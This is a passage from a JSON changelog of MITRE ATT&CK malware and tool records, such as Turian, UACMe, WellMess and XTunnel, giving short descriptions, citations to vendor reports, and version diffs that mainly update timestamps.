"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:39.011000+00:00\", \"old_value\": \"2025-04-16 20:38:14.507000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--350f12cf-fd3b-4dad-b323-14b943090df4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-21 15:21:31.795000+00:00", + "modified": "2025-04-25 14:43:01.037000+00:00", + "name": "Turian", + "description": "[Turian](https://attack.mitre.org/software/S0647) is a backdoor that has been used by [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, [Turian](https://attack.mitre.org/software/S0647) is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.(Citation: ESET BackdoorDiplomacy Jun 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0647", + "external_id": "S0647" + }, + { + "source_name": "ESET BackdoorDiplomacy Jun 2021", + "description": "Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021", + "url": "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Turian" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Zaw Min Htun, @Z3TAE" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:01.037000+00:00\", \"old_value\": \"2025-04-16 20:38:02.104000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--102c3898-85e0-43ee-ae28-62a0a3ed9507", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:09.047000+00:00", + "modified": "2025-04-25 14:45:13.232000+00:00", + "name": "UACMe", + "description": "[UACMe](https://attack.mitre.org/software/S0116) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. (Citation: Github UACMe)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0116", + "external_id": "S0116" + }, + { + "source_name": "Github UACMe", + "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.", + "url": "https://github.com/hfiref0x/UACME" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:13.232000+00:00\", \"old_value\": \"2025-04-16 20:38:49.934000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:45:09.125000+00:00", + "name": "UPPERCUT", + "description": "[UPPERCUT](https://attack.mitre.org/software/S0275) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045). (Citation: FireEye APT10 Sept 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0275", + "external_id": "S0275" + }, + { + "source_name": "UPPERCUT", + "description": "(Citation: FireEye APT10 Sept 2018)" + }, + { + "source_name": "ANEL", + "description": "(Citation: FireEye APT10 Sept 2018)" + }, + { + "source_name": "FireEye APT10 Sept 2018", + "description": "Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "UPPERCUT", + "ANEL" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:09.125000+00:00\", \"old_value\": \"2025-04-16 20:38:44.933000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-20 19:54:06.476000+00:00", + "modified": "2025-04-25 14:43:47.313000+00:00", + "name": "USBferry", + "description": "[USBferry](https://attack.mitre.org/software/S0452) is an information stealing malware and has been used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) in targeted attacks against Taiwanese and Philippine air-gapped military environments. [USBferry](https://attack.mitre.org/software/S0452) shares an overlapping codebase with [YAHOYAH](https://attack.mitre.org/software/S0388), though it has several features which makes it a distinct piece of malware.(Citation: TrendMicro Tropic Trooper May 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0452", + "external_id": "S0452" + }, + { + "source_name": "TrendMicro Tropic Trooper May 2020", + "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.", + "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "USBferry" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:47.313000+00:00\", \"old_value\": \"2025-04-16 20:38:17.950000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--3d8e547d-9456-4f32-a895-dc86134e282f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:43:05.057000+00:00", + "name": "Umbreon", + "description": "A Linux rootkit that provides backdoor access and hides from defenders.", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0221", + "external_id": "S0221" + }, + { + "source_name": "Umbreon", + "description": "(Citation: Umbreon Trend Micro)" + }, + { + "source_name": "Umbreon Trend Micro", + "description": "Fernando Merc\u00eas. (2016, September 5). Pok\u00e9mon-themed Umbreon Linux Rootkit Hits x86, ARM Systems. Retrieved March 5, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?_ga=2.180041126.367598458.1505420282-1759340220.1502477046" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Umbreon" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:05.057000+00:00\", \"old_value\": \"2025-04-16 20:38:03.511000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--ab3580c8-8435-4117-aace-3d9fbe46aa56", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:15.020000+00:00", + "modified": "2025-04-25 14:44:22.301000+00:00", + "name": "Unknown Logger", + "description": "[Unknown Logger](https://attack.mitre.org/software/S0130) is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. (Citation: Forcepoint Monsoon)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0130", + "external_id": "S0130" + }, + { + "source_name": "Forcepoint Monsoon", + "description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.", + "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Unknown Logger" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:22.301000+00:00\", \"old_value\": \"2025-04-16 20:38:29.897000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-08 20:43:25.743000+00:00", + "modified": "2025-04-25 14:43:59.751000+00:00", + "name": "VBShower", + "description": "[VBShower](https://attack.mitre.org/software/S0442) is a backdoor that has been used by [Inception](https://attack.mitre.org/groups/G0100) since at least 2019. [VBShower](https://attack.mitre.org/software/S0442) has been used as a downloader for second stage payloads, including [PowerShower](https://attack.mitre.org/software/S0441).(Citation: Kaspersky Cloud Atlas August 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0442", + "external_id": "S0442" + }, + { + "source_name": "Kaspersky Cloud Atlas August 2019", + "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. Retrieved May 8, 2020.", + "url": "https://securelist.com/recent-cloud-atlas-activity/92016/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "VBShower" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:59.751000+00:00\", \"old_value\": \"2025-04-16 20:38:21.823000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--96eca9b9-b37f-42f1-96dc-a2c441403194", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-04 15:02:56.965000+00:00", + "modified": "2025-04-25 14:44:08.033000+00:00", + "name": "VaporRage", + "description": "[VaporRage](https://attack.mitre.org/software/S0636) is a shellcode downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0636", + "external_id": "S0636" + }, + { + "source_name": "MSTIC Nobelium Toolset May 2021", + "description": "MSTIC. (2021, May 28). Breaking down NOBELIUM\u2019s latest early-stage toolset. Retrieved August 4, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "VaporRage" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:08.033000+00:00\", \"old_value\": \"2025-04-16 20:38:24.732000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:44:09.479000+00:00", + "name": "WINDSHIELD", + "description": "[WINDSHIELD](https://attack.mitre.org/software/S0155) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0155", + "external_id": "S0155" + }, + { + "source_name": "FireEye APT32 May 2017", + "description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:09.479000+00:00\", \"old_value\": \"2025-04-16 20:38:25.359000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--959f3b19-2dc8-48d5-8942-c66813a5101a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-29 17:48:27.517000+00:00", + "modified": "2025-04-25 14:44:06.771000+00:00", + "name": "WellMail", + "description": "[WellMail](https://attack.mitre.org/software/S0515) is a lightweight malware written in Golang used by [APT29](https://attack.mitre.org/groups/G0016), similar in design and structure to [WellMess](https://attack.mitre.org/software/S0514).(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0515", + "external_id": "S0515" + }, + { + "source_name": "CISA WellMail July 2020", + "description": "CISA. (2020, July 16). MAR-10296782-3.v1 \u2013 WELLMAIL. Retrieved September 29, 2020.", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c" + }, + { + "source_name": "NCSC APT29 July 2020", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "WellMail" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Josh Campbell, Cyborg Security, @cyb0rgsecur1ty" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:06.771000+00:00\", \"old_value\": \"2025-04-16 20:38:24.228000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-24 19:39:44.392000+00:00", + "modified": "2025-04-25 14:43:03.067000+00:00", + "name": "WellMess", + "description": "[WellMess](https://attack.mitre.org/software/S0514) is lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by [APT29](https://attack.mitre.org/groups/G0016).(Citation: CISA WellMess July 2020)(Citation: PWC WellMess July 2020)(Citation: NCSC APT29 July 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0514", + "external_id": "S0514" + }, + { + "source_name": "CISA WellMess July 2020", + "description": "CISA. (2020, July 16). MAR-10296782-2.v1 \u2013 WELLMESS. Retrieved September 24, 2020.", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b" + }, + { + "source_name": "PWC WellMess July 2020", + "description": "PWC. (2020, July 16). How WellMess malware has been used to target COVID-19 vaccines. Retrieved September 24, 2020.", + "url": "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html" + }, + { + "source_name": "NCSC APT29 July 2020", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. Retrieved September 29, 2020.", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "WellMess" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:03.067000+00:00\", \"old_value\": \"2025-04-16 20:38:02.903000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--22addc7b-b39f-483d-979a-1b35147da5de", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:40.004000+00:00", + "modified": "2025-04-25 14:42:50.511000+00:00", + "name": "WinMM", + "description": "[WinMM](https://attack.mitre.org/software/S0059) is a full-featured, simple backdoor used by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0059", + "external_id": "S0059" + }, + { + "source_name": "Baumgartner Naikon 2015", + "description": "Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "WinMM" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:50.511000+00:00\", \"old_value\": \"2025-04-16 20:37:58.498000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a8d3d497-2da9-4797-8e0b-ed176be08654", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:44:20.703000+00:00", + "name": "Wingbird", + "description": "[Wingbird](https://attack.mitre.org/software/S0176) is a backdoor that appears to be a version of commercial software [FinFisher](https://attack.mitre.org/software/S0182). It is reportedly used to attack individual computers instead of networks. It was used by [NEODYMIUM](https://attack.mitre.org/groups/G0055) in a May 2016 campaign. (Citation: Microsoft SIR Vol 21) (Citation: Microsoft NEODYMIUM Dec 2016)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0176", + "external_id": "S0176" + }, + { + "source_name": "Wingbird", + "description": "(Citation: Microsoft SIR Vol 21) (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft Wingbird Nov 2017)" + }, + { + "source_name": "Microsoft SIR Vol 21", + "description": "Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.", + "url": "http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf" + }, + { + "source_name": "Microsoft NEODYMIUM Dec 2016", + "description": "Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved November 27, 2017.", + "url": "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/" + }, + { + "source_name": "Microsoft Wingbird Nov 2017", + "description": "Microsoft. (2017, November 9). Backdoor:Win32/Wingbird.A!dha. Retrieved November 27, 2017.", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Wingbird.A!dha" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Wingbird" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:20.703000+00:00\", \"old_value\": \"2025-04-16 20:38:29.211000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--a19c49aa-36fe-4c05-b817-23e1c7a7d085", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:32.915000+00:00", + "modified": "2025-04-25 14:44:15.681000+00:00", + "name": "Wiper", + "description": "[Wiper](https://attack.mitre.org/software/S0041) is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. (Citation: Dell Wiper)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0041", + "external_id": "S0041" + }, + { + "source_name": "Dell Wiper", + "description": "Dell SecureWorks. (2013, March 21). Wiper Malware Analysis Attacking Korean Financial Sector. Retrieved May 13, 2015.", + "url": "http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:15.681000+00:00\", \"old_value\": \"2025-04-16 20:38:28.028000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--59a97b15-8189-4d51-9404-e1ce8ea4a069", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:43:27.602000+00:00", + "name": "XAgentOSX", + "description": "[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0161", + "external_id": "S0161" + }, + { + "source_name": "XAgentOSX", + "description": "(Citation: XAgentOSX 2017)" + }, + { + "source_name": "OSX.Sofacy", + "description": "(Citation: Symantec APT28 Oct 2018)" + }, + { + "source_name": "XAgentOSX 2017", + "description": "Robert Falcone. (2017, February 14). XAgentOSX: Sofacy's Xagent macOS Tool. Retrieved July 12, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" + }, + { + "source_name": "Symantec APT28 Oct 2018", + "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.", + "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "XAgentOSX", + "OSX.Sofacy" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:27.602000+00:00\", \"old_value\": \"2025-04-16 20:38:10.547000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "malware", + "id": "malware--7343e208-7cab-45f2-a47b-41ba5e2f0fab", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:09.453000+00:00", + "modified": "2025-04-25 14:43:45.148000+00:00", + "name": "XTunnel", + "description": "[XTunnel](https://attack.mitre.org/software/S0117) a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by [APT28](https://attack.mitre.org/groups/G0007) during the compromise of the Democratic National Committee. (Citation: Crowdstrike DNC June 2016) (Citation: Invincea XTunnel) (Citation: ESET Sednit Part 2)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0117", + "external_id": "S0117" + }, + { + "source_name": "XTunnel", + "description": "(Citation: ESET Sednit Part 2)" + }, + { + "source_name": "Trojan.Shunnael", + "description": "(Citation: Symantec APT28 Oct 2018)" + }, + { + "source_name": "X-Tunnel", + "description": "(Citation: Crowdstrike DNC June 2016)(Citation: Symantec APT28 Oct 2018)" + }, + { + "source_name": "XAPS", + "description": "(Citation: ESET Sednit Part 2)" + }, + { + "source_name": "Crowdstrike DNC June 2016", + "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.", + "url": 